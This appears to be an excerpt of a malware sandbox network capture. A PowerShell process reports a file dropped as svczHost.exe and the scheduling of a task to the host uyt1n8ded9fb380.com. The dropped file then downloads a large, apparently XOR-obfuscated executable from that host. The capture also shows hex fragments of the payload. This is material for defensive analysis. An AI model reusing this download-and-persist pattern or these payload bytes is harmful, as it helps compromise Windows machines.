                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 cf 25 01 49 8c 04 71 db 4f 01 49 8c 0c 60 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b cf 25 01 49 8c 04 92 db 4f 01 49 8c 0c 85 db 4f 01 49 82 38 01 74 00 c2 49 8a d1
                                                                                    Data Ascii: :OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tIf%IqOI`OI8tIK%IOIOI8tI
                                                                                    2024-11-08 10:29:59 UTC516INData Raw: ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 0e 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 49 8c 04 f6 54 90 01 49 8a 01 49 8c 0c
                                                                                    Data Ascii: OI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,OI8tI%IWIIOI8tI%ITII
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04 0e 54 90 01 49 8a 01 49 8c 0c 0c cb 4f 01
                                                                                    Data Ascii: 8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%ITIIO
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c0 25 01 49 8c 04 16 53 90 01 49 8a 01
                                                                                    Data Ascii: \OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tIg%ISI
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bd 25 01 49 8c 04
                                                                                    Data Ascii: NIIOI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8tI%I
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4 c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8
                                                                                    Data Ascii: %IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OIIOI8tI
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01 49 8a 01 49 8c 0c 64 be 4f 01 49 82 38 01
                                                                                    Data Ascii: IG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|OI8tIg%IKIIdOI8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.11.3049785104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:30:11 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 200
                                                                                    2024-11-08 10:30:11 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                    2024-11-08 10:30:12 UTC945INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:30:12 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrulFxeoky4dZRp5TTQRNz6xbnnXigqkKgf7iBShmSzOh%2F2IEMC%2BOMsPixw3X427tr8iK8B%2BpCwjGdJu6KY%2FiXeoYbujE8I4Z6RYj8Cz9YiK3yQpj9z%2FfmQQsBqUMgq6podcN8l3qPlp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=8363&sent=4662&recv=2418&lost=0&retrans=0&sent_bytes=6489737&recv_bytes=28947&delivery_rate=48152219&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2e3de9e4356-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102251&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1150&delivery_rate=37206&cwnd=193&unsent_bytes=0&cid=d91b106f2f7d9449&ts=572&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.11.3049786104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:30:12 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 97
                                                                                    2024-11-08 10:30:12 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                    2024-11-08 10:30:13 UTC952INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:30:13 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuIHkSrr9wqxkxFME%2FuC9S8bwxlv2lBQV%2B4dv5m%2FRYfq3XiCFYvpCUF9vD5MxM2tq6rzmzMkTafkZ0FXgrUYHa1hMc0%2BubHz1%2BBA6ANntgfSn%2Bt0WeES6Xc%2B3xj8rIIrD1PEk%2BP5vbwz"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13671&sent=3996&recv=2103&lost=0&retrans=0&sent_bytes=5536764&recv_bytes=27809&delivery_rate=55694822&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2e8eaec5e71-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102165&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1046&delivery_rate=37469&cwnd=252&unsent_bytes=0&cid=a1cd8c1e161a839d&ts=821&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.11.3049787104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:30:15 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 64
                                                                                    2024-11-08 10:30:15 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                    2024-11-08 10:30:16 UTC947INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:30:16 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MxYHUg%2BvTpr%2FbDdG2RknrhpvMW3bbsPqtxyzVKFCQLO232q95Q3dXJN6wLZQM64j8LYJ5y%2Fl3agw7VjmpUslIK2YnBCRyUF15SUvVQ6r7WCmLwh%2FkFBCKYeFdXEdMAPMFb25pSw%2BKgjB"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=8278&sent=13387&recv=7033&lost=0&retrans=0&sent_bytes=18638442&recv_bytes=25035&delivery_rate=19825412&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2fbe9ed6a5c-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=106097&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1013&delivery_rate=33488&cwnd=250&unsent_bytes=0&cid=f6bd77f6baa34d2c&ts=603&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.11.3049789104.21.86.2194434540C:\Windows\Temp\svczHost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:31:00 UTC69OUTGET /StaticFile/RdpService/54 HTTP/1.1
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:31:00 UTC1100INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:31:00 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 9427456
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    hash: F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oa0C7lV3nU6tvyB5hj4PBhpVe%2BMo3nCVlLCPJDlHRDduzb0FwPUwhCjItBEWl27JwCqIuS%2FlZWIJ56BtmY5sho3WjtQwepC3HIchVrPUXy5FdvPVBuUv29ytdIZmDNFBa6DxT%2BVkFiu"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=17410&sent=4003&recv=2113&lost=0&retrans=0&sent_bytes=5538429&recv_bytes=35689&delivery_rate=55694822&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e41428a143d3-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102202&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=707&delivery_rate=37450&cwnd=252&unsent_bytes=0&cid=72535937840e1859&ts=636&x=0"
                                                                                    2024-11-08 10:31:00 UTC269INData Raw: 7b 6c a6 36 35 36 36 36 32 36 36 36 c9 c9 36 36 8e 36 36 36 36 36 36 36 76 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 37 36 36 38 29 8c 38 36 82 3f fb 17 8e 37 7a fb 17 62 5e 5f 45 16 46 44 59 51 44 57 5b 16 55 57 58 58 59 42 16 54 53 16 44 43 58 16 5f 58 16 72 79 65 16 5b 59 52 53 18 3b 3b 3c 12 36 36 36 36 36 36 36 d8 db 00 16 9c ba 6e 45 9c ba 6e 45 9c ba 6e 45 95 c2 fd 45 92 ba 6e 45 ec 3b 6f 44 8b ba 6e 45 9c ba 6f 45 1a bb 6e 45 8c 3e 6d 44 8f ba 6e 45 8c 3e 6a 44 a5 ba 6e 45 d4 3f 6b 44 9f ba 6e 45 ec 3b 6a 44 9e ba 6e 45 9c ba 6e 45 9d ba 6e 45 8c 3e 6b 44 ea ba 6e 45 d4 3f 6e 44 9d ba 6e 45 d4 3f 6c 44 9d ba 6e 45 64 5f 55 5e 9c ba 6e 45 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36
                                                                                    Data Ascii: {l656662666666666666v6666666666666666666666666666666666667668)86?7zb^_EFDYQDW[UWXXYBTSDCX_Xrye[YRS;;<6666666nEnEnEEnE;oDnEoEnE>mDnE>jDnE?kDnE;jDnEnEnE>kDnE?nDnE?lDnEd_U^nE666666666666666
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: 36 36 36 36 36 36 36 c6 36 14 36 3d 34 38 1f 36 0c 66 36 36 a6 77 36 36 2c 2a 36 ae e7 3d 36 36 26 36 36 36 36 36 76 37 36 36 36 36 26 36 36 36 34 36 36 30 36 36 36 36 36 36 36 30 36 36 36 36 36 36 36 36 76 98 36 36 32 36 36 36 36 36 36 35 36 56 b7 36 36 26 36 36 36 36 36 36 26 36 36 36 36 36 36 36 36 26 36 36 36 36 36 36 26 36 36 36 36 36 36 36 36 36 36 26 36 36 36 36 f0 93 36 3e 34 36 36 3e fe 93 36 4a 37 36 36 36 26 98 36 84 33 36 36 36 b6 9e 36 fe b0 33 36 36 36 36 36 36 36 36 36 36 16 98 36 7a 22 36 36 a6 9a af 36 2a 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 b6 98 af 36 1e 36 36 36 66 9d af 36 76 37 36 36 36 36 36 36 36 36 36 36 36 b6 5a 36 f6 3d 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 18 42 53 4e
                                                                                    Data Ascii: 666666666=486f66w66,*6=66&66666v76666&66646606666666066666666v66266666656V66&666666&66666666&666666&6666666666&66666>466>6J7666&636666366666666666z"666*66666666666666666666666f6v766666666666Z6=66666666666666666666666666BSN
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: 6e 36 7e bb 3b d7 b8 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df f4 e2 1e 36 7e bb 33 7d b9 6e 36 7e bb 3b 0a b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 93 e2 1e 36 7e bb 33 08 b9 6e 36 7e bb 3b 19 b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df be e2 1e 36 7e bb 33 07 b9 6e 36 7e bb 3b 14 b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5d e2 1e 36 7e bb 33 12 b9 6e 36 7e bb 3b 23 b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 78 e2 1e 36 7e bb 33 21 b9 6e 36 7e bb 3b 3e b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 07 e2 1e 36 7e bb 33 3c b9 6e 36 7e bb 3b cd b8 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 22 e2 1e 36 7e bb 33 cb b8 6e 36 7e bb 3b d8 b8 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df c1 e5 1e 36 7e bb 33 2e b9 6e 36 7e bb 3b 3f b9 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df ec e5 1e
                                                                                    Data Ascii: n6~;n6~6C7~6~3}n6~;n6~6C7~6~3n6~;n6~6C7~6~3n6~;n6~6C7~]6~3n6~;#n6~6C7~x6~3!n6~;>n6~6C7~6~3<n6~;n6~6C7~"6~3n6~;n6~6C7~6~3.n6~;?n6~6C7~
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 59 f9 1e 36 7e bb 33 ae a7 6e 36 7e bb 3b bf a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 64 f9 1e 36 7e bb 33 bd a7 6e 36 7e bb 3b 4a a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 03 f9 1e 36 7e bb 33 48 a7 6e 36 7e bb 3b 59 a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 2e f9 1e 36 7e bb 33 4f a7 6e 36 7e bb 3b 5c a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df cd f8 1e 36 7e bb 33 42 a7 6e 36 7e bb 3b 53 a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df e8 f8 1e 36 7e bb 33 d9 a7 6e 36 7e bb 3b d6 a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df f7 f8 1e 36 7e bb 33 dc a7 6e 36 7e bb 3b ed a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 92 f8 1e 36 7e bb 33 d3 a7 6e 36 7e bb 3b e0 a7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df b1 f8 1e 36 7e bb 33 1e a4
                                                                                    Data Ascii: n6~6C7~Y6~3n6~;n6~6C7~d6~3n6~;Jn6~6C7~6~3Hn6~;Yn6~6C7~.6~3On6~;\n6~6C7~6~3Bn6~;Sn6~6C7~6~3n6~;n6~6C7~6~3n6~;n6~6C7~6~3n6~;n6~6C7~6~3
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: 33 45 39 90 36 7e bd 36 7e bb 3b 67 b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc ff 1e 36 7e bb 33 6d 39 90 36 7e bd 36 7e bb 3b 0f b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc ff 1e 36 7e bb 33 4d 39 90 36 7e bd 36 7e bb 3b 0f b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 9c ff 1e 36 7e bb 33 55 39 90 36 7e bd 36 7e bb 3b 17 b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc ff 1e 36 7e bb 33 7d 39 90 36 7e bd 36 7e bb 3b 0f b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c ff 1e 36 7e bb 33 75 39 90 36 7e bd 36 7e bb 3b 67 b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 7c ff 1e 36 7e bb 33 1d 39 90 36 7e bd 36 7e bb 3b 0f b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c ff 1e 36 7e bb 33 2d 39 90 36 7e bd 36 7e bb 3b 07 b4 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c ff 1e 36 7e
                                                                                    Data Ascii: 3E96~6~;gn6~6C7~6~3m96~6~;n6~6C7~6~3M96~6~;n6~6C7~6~3U96~6~;n6~6C7~6~3}96~6~;n6~6C7~\6~3u96~6~;gn6~6C7~|6~396~6~;n6~6C7~6~3-96~6~;n6~6C7~<6~
                                                                                    2024-11-08 10:31:00 UTC1369INData Raw: df 9c f2 1e 36 7e bb 33 cd 3a 90 36 7e bd 36 7e bb 3b 77 b7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df bc f2 1e 36 7e bb 33 d5 3a 90 36 7e bd 36 7e bb 3b 1f b7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 5c f2 1e 36 7e bb 33 fd 3a 90 36 7e bd 36 7e bb 3b 27 b7 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 7c f2 1e 36 7e bb 33 e5 3a 90 36 7e bd 36 7e bb 3b cf b6 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 1c f2 1e 36 7e bb 33 fd 3a 90 36 7e bd 36 7e bb 3b d7 b6 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df 3c f2 1e 36 7e bb 33 85 3a 90 36 7e bd 36 7e bb 3b ff b6 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df dc f5 1e 36 7e bb 33 95 3a 90 36 7e bd 36 7e bb 3b 87 b6 6e 36 7e b5 0f 36 43 37 f5 7e bd e6 df fc f5 1e 36 7e bb 33 a5 3a 90 36 7e bd 36 7e bb 3b af b6 6e 36 7e b5 0f 36 43 37 f5 7e bd
